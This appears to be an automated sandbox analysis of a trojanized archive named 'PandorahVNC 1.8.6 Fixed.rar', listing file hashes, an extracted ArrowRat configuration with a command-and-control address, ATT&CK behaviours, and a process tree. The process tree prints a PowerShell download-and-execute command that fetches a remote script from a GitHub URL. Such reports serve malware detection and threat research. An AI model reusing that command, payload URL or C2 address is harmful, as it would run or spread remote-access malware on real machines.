Analysis
-
max time kernel
125s -
max time network
144s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
-
submitted
04/03/2025, 22:03
General
-
Target
PandorahVNC 1.8.6 Fixed.rar
-
Size
26.2MB
-
MD5
93e38c285d4703b75890c99dd30f72cb
-
SHA1
77e353c82b805d1d55fdb16a4c559e876ff9d3e6
-
SHA256
04a15dcd45994e3181c002ecb3a5b6cb203b5dc05d634fe4cb015f76a4a006fd
-
SHA512
8253b0147cad4a3f7722d51294c99b1cc5391abb6a183e406d53eccc17099a5a5dadd4efe9bc6df452d5d463001416090f96950d578d64614de93ec871899ff2
-
SSDEEP
786432:5I8Am1JqFB9q+8wxzMZLRZ3MojlU7azLlCNRu0qvYyCifjoPq7:zd0ZUZc6U7azLAKbYyC0MPq7
Malware Config
Extracted
https://raw.githubusercontent.com/PandorahVNC/PhotoCollection/main/rescale.ps1
Extracted
arrowrat
#GroupName#
#IP#:#PORT#
#Mutex#
Extracted
arrowrat
Client
80.76.49.15:1112
127.0.0.1:1337
System
Signatures
-
ArrowRat
Remote access tool with various capabilities first seen in late 2021.
-
Arrowrat family
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 22 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 8 IoCs
-
Modifies registry class 55 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 8 IoCs
-
Suspicious use of SetWindowsHookEx 13 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\PandorahVNC 1.8.6 Fixed.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\PandorahVNC 1.8.6 Fixed\PandorahVNC.exe"C:\Users\Admin\Desktop\PandorahVNC 1.8.6 Fixed\PandorahVNC.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\Desktop\PandorahVNC 1.8.6 Fixed2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\Desktop\PandorahVNC 1.8.6 Fixed2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\PandorahVNC 1.8.6 Fixed\Client.exe"C:\Users\Admin\Desktop\PandorahVNC 1.8.6 Fixed\Client.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 127.0.0.1 1337 naIToeHRt3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c powershell.exe -exec bypass -C IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PandorahVNC/PhotoCollection/main/rescale.ps1');4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass -C IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PandorahVNC/PhotoCollection/main/rescale.ps1');5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u5dx2n4d\u5dx2n4d.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE248.tmp" "c:\Users\Admin\AppData\Local\Temp\u5dx2n4d\CSCFE2A33B0301449D5814FE5F9DFE6422.TMP"7⤵
-
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
Filesize
1KB
MD5535d073d976ea6a04c3ed8ac187ebe85
SHA1c15178519629461974532fc5092a95901e00652b
SHA256a4c4437c0965050cafe50b32e94d8dba57d46f2a3b6709a2d454f3e335d9c2c4
SHA512b2052fae55886b7ba09decefa1d31641ee80bfc806a57be27314d77f97e7c6e92c60e223034ad3b61f17b31df3592b51f9ad0c3086566c9185615ca6628f5619
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5249a353fec1a0410c3659714fd9b20ed
SHA127966ba161bacbdf8d1944af7588d15a9ba6278c
SHA256c320b9e4ee634f6bec06f8905b6145e4f39ae69b9d7f5980d96919949505a8ee
SHA51289ae6c1d966e55e321a9987cf64601f59d8df10950184d5e28ae8dee13a9b0b4606601871795066423659855aa8b3e519551a44a4b96c29f760df61dd59b630e
-
Filesize
482KB
MD56b6109d97c2c08e06e4fcf80d24b4dce
SHA1a811ec710fcbb6d43b35f5a943c58258bee43d7d
SHA256f066cdd5dcd0eb2ca082ad30b1240bdc4d9c76ef80caf81651a827238e79b226
SHA512408a929c1c5cc0825a28dd7c129898c5b762b701fe46a0ca395c16cecf54f41b4f9b9155fbb41f0c591f4d22889a43b7d2e4c33d13314420e68366552f609cc6
-
Filesize
40KB
MD571437beaf0306a777814de1c56234842
SHA1f8b1a61a07ab07c8565988b04f614aa77f28b456
SHA256514078545cb23a0841785378d3e9fdff31d0a214e80513d630b7b95243b4d464
SHA5127666bdb81250b8e212fe890919e2b6765ba0ae2c547192614419c3d2f066f0db63d252dab044bd72d549a638e41c7775d7efb1c7c2cd071e02ae344f789644de
-
Filesize
304KB
MD5a8a09cdbacc2aaff5eba75c0f7e22635
SHA1571facc8b653745f08bd62511106d648fa6875e4
SHA256dfb80e5bc73b640c20d930f9ace66bd55476ea34f1027331ff6d8df0c10fbc3e
SHA51230a33556d56acbc5e8b1ef50b3922f8624255ec95c25831e8c064efdc2e5696b5026273303213d943983136422ee500e7d2d6b0f55515ff6f5de5e1268809e30
-
Filesize
57KB
MD55bedce9a21e6c1177630d5109bd5a18a
SHA12f34c95cb011eefb0819ad7f42da86fe239b0739
SHA25605dffab67a19f7925b13b3d68e6e8c72015ff920664c5e26a3d18fe2b10f9c47
SHA5122c2a8a4925174ca5ac4b42434f9d7cd82d7c3a95fafd242f3435c13114a98daf4f15b1ec8c48be74341f70d800c80072f85ecec4b193e06ba379dfc0a6f02958
-
Filesize
158KB
MD50234362ccf92b3341d400e67b5221c6f
SHA153d5032fc48c475cdd9b346d949ddb2378682a6b
SHA256fb31c1d2d463e4cc59500eee0c5273cee808ec259c7e9a7b3bdab1ee4fbd223b
SHA51244d597c74fc6d6285a1eaa5702ca450db159724e5f16845ed42430b6285f868c3a585835c3c0bb5503ffe8a03351aa2162b831309d469229f22edbb3a4af018c
-
Filesize
158KB
MD595bc6f7cadc00898e530eb43bcfb815d
SHA15b1d225b0560525217213f530d6fc62617ca434e
SHA256d7393166ea3216ad047cf514149014b991cf6a80b253134337adc9fa41cf0c22
SHA512df8f0bbf1cf1aea106cf3e30a1ff3abc9ff9788eb52aedc9288f2905b15e7c67a14119ee23f802a1b035d77361cd75299d1160a2ea78212ac28f5f949898d627
-
Filesize
675KB
MD56674898c963081e76c7168d45b1a57cd
SHA197717ef70d9bdde1568cf544fb3b2402321c1b25
SHA256d769d543d9166e40bca4decf4b5ee758b4b652064790879780cc1521571763b2
SHA51232021dd7e2595e2fac0bc6e6a4502d67543266714415888c267168c8ed34612a57a30ed0b07cf7cc78339626220c5d2a8770f5aeaaffd3367433046593500242
-
Filesize
5.1MB
MD5ba67d6f97a1602d7851e13811f34b257
SHA15a40175c27510f1bb59f32f3fea37ff1ff5e2414
SHA2564f6510675493bbbc8e0870245247c0219456b51d0044237c4c861a67834a337e
SHA51257b22c6a1425e8b0e637bdc15994902e5623d1921a6a2a0bad00dec1e2f97911d9904fac0c06c3bd3ec3cf9523e263cd2e8e12fd8748f66f867ebc3dce85c22a
-
Filesize
17.7MB
MD59ce1f7fb40d7c257536b6eefbaf50fdb
SHA1022664d1870fec449fa0fc69abc854e4ac8bf165
SHA2566e28b52f542833d5aeacee111ebcbb35af5ab080ef542172a9dc9f0f1004da44
SHA51214deb1593111ca6a67c41abb60ee2105286dfce34ab525d6d57b9233f083dfdd3b1a8865d5515ac23fe0f401d85dbe973e020fef015e7adb3efda8f8ab9fe572
-
Filesize
6.5MB
MD573b7ae515035721d1b30d3ad00628be0
SHA1dce18955cd395858cace1ce58a29abc4fbb805de
SHA2569f788e7aa3f1a2be7f02419a8fd74114e5e2a7bb134810aa6cf762cbc91c1a56
SHA5124c018f1bbf3eb947410d4910208b050b60e722854066e970e9963fc79ca17fc26e64d2f3b7555657576950d036623b0d6c67a78a009feda02d4c30eeb114d1dc
-
Filesize
7.5MB
MD5e6bdc7adbfa92810e66497d3561c5e2b
SHA1c9379603d4fcfad4e1874f956247428f27e5ce79
SHA25619d4e54a19fc830f8f4b6911fe76d74400fe23798a40b5941114437462b90ca9
SHA5125c9d19b6e4521386162de18004103cc4ad9e2fea91ac4434f8c125cdb5b35335e9659fd19f5507b849a768f96154db90869db336aa76d9b9e760e254f01c7dfc
-
Filesize
3.6MB
MD5f65ebb9d378cf034eb5d8d0742ca95d1
SHA1ad883ba15f66287c749239fbec20bf4fef91b0f9
SHA25635674b0093a4134505ff3cf40c3b07ab428c152f7ba41f93dd1775b6013b87c2
SHA512ac347de3933f3a3214a33a593ad2f963d6427b69685332982707002296b595707595a6e5e3662f44447f6247fdddb0298479d600a2672ed1dcbb50a520467609
-
Filesize
2.0MB
MD5012422aff6771f7be353109f08bf4684
SHA1535a3054abf0ef1f6c2a220bd9741962c8e58dbe
SHA256dc2e06f341325a7c65c121e443d0ca3dd0a1ea5ee5ed21ae51029303394de00f
SHA512a3ca2f8d991a3823b58f81bfa5c08b7c44a985d029d8838ac501a08bef3cb90ceee3fdbb0e6d2b66544061b05e8fe3563d3868b0d3266b3b280cc39e0b2f5c1b
-
Filesize
5.1MB
MD53fe52ef1496671741e0cfb8be67100f8
SHA168152d06cd2076764b44f9892a8c2031ff988845
SHA2569ace7f9e68924f030786b62f855da4fdaa88cd06795805afb7d8ea8f23dd2d76
SHA512b3edbce17ac9736fbb5de58081b161cf34b147b1843be947d03f6e296e47e7b0b14d35630ae78e3f88567f8c582966fae6774838ab8ab137acc4a66e68f887f3
-
Filesize
5.0MB
MD5f1984279714a111cb603f71457042255
SHA1d7b0b12dba09db0bfa318a2d62a1ac6781313112
SHA256e6986e80395ec6fb4fc2450dd4de5ea81ba8d489a1464a1108a98f6541967af6
SHA5125f2aee19063150d540477fa920677cafac2304bbe5febbde0e0e0a299da437fa7a7eae0629f36e6cbe3cf456c686195b3acfac34a4a079c20ae9eacff9fdf33f
-
Filesize
3KB
MD5a1c2a2870001b66db41bcb020bff1c2d
SHA18c54c6a3564c8892aa9baa15573682e64f3659d9
SHA2560aa9e3ab5c88c5761120206eff5c6e35c90288290b3647a942059705ef5b75e5
SHA512b3bf53120203cfaa951f301b532849cb382d2404c9503916bc1ca39925a9a1530b01045f341fc75d47d65130d0187dcbbf4288b9ef46aa81624b59ba7802794b
-
Filesize
158KB
MD552cf7937369803694284f5047c3ec1c5
SHA1fae5a134b78e52e7dfd46b8bd04c01e1b044b709
SHA2563b2ab6f350d355c4457c0e0e7cdf43f58d71259c7ca243caf75fcee5bf265a6d
SHA512fcefb2e3bc3a51c4c94093da253231d05364084bb533ed64eb9c406e30ec9fedba9d665c4fa27c2965a7cbda82ced6a672f6b926d626d49e01ef7ed4be591efa
-
Filesize
20KB
MD5ecdfe8ede869d2ccc6bf99981ea96400
SHA12f410a0396bc148ed533ad49b6415fb58dd4d641
SHA256accccfbe45d9f08ffeed9916e37b33e98c65be012cfff6e7fa7b67210ce1fefb
SHA5125fc7fee5c25cb2eee19737068968e00a00961c257271b420f594e5a0da0559502d04ee6ba2d8d2aad77f3769622f6743a5ee8dae23f8f993f33fb09ed8db2741
-
Filesize
652B
MD594996ad49751549450dd4053f0d6000f
SHA1f4f6798c01881f2f61020d69090ef648967f151b
SHA256d5c99a266f62f85ea6afd6dde55c45a78394b2e41cbb65d6927375b4be5316b1
SHA512d93f47bdedaa889ce32104f0bfbab45c4941d6b14151ec76c0a7b9e19255380d35a934e1eae722f74c1f6b7366f5e2f2d0c39ab2d8f0708ea81a8d916b400610
-
Filesize
375B
MD5c4f59366be6008ba572e3126ba8ec495
SHA1b7355b6bd3a6f3efb3ce0953ba361428bd4b3734
SHA256c5a13dc875ef77ddf57f9852b60b245c693c6be273797bac9477e84d8926348e
SHA5127f22eae4b58fa438cda221e0b4dee105f008e20ff1669486b9ec2efc746e6ce0e528d9dd3d39c50a9a385bfb52cd9cc3786b79b468c46e9446a90758f15f4196
-
Filesize
369B
MD569c7f66b4e7da23ccbc54c1ef1f30ab1
SHA1db1f2856fb638440738ce3ba38b63b52413c5bad
SHA256713e53a15b5721b0add19b99731b447ca42cfe54ca735973d03196b4a314c4b3
SHA512169143373f8bc1468a13ab65e30c61632d0d956c47e73ee2b7b27c1c536627153fb1d438bdbef6dcf26144011f6ad11d5f204c3268c6a880fa1df25f66716cba
-
Filesize
624KB
-
Filesize
328KB
-
Filesize
3.6MB
-
Filesize
2.1MB
-
Filesize
3.3MB
-
Filesize
680KB
-
Filesize
6.5MB
-
Filesize
7.7MB
-
Filesize
504KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
224KB
-
Filesize
584KB
-
Filesize
184KB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
32KB
-
Filesize
7.7MB
-
Filesize
704KB
-
Filesize
7.5MB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
5.0MB
-
Filesize
72KB
-
Filesize
5.1MB
-
Filesize
5.6MB
-
Filesize
17.8MB
-
Filesize
184KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
32KB
-
Filesize
320KB
-
Filesize
408KB
-
Filesize
96KB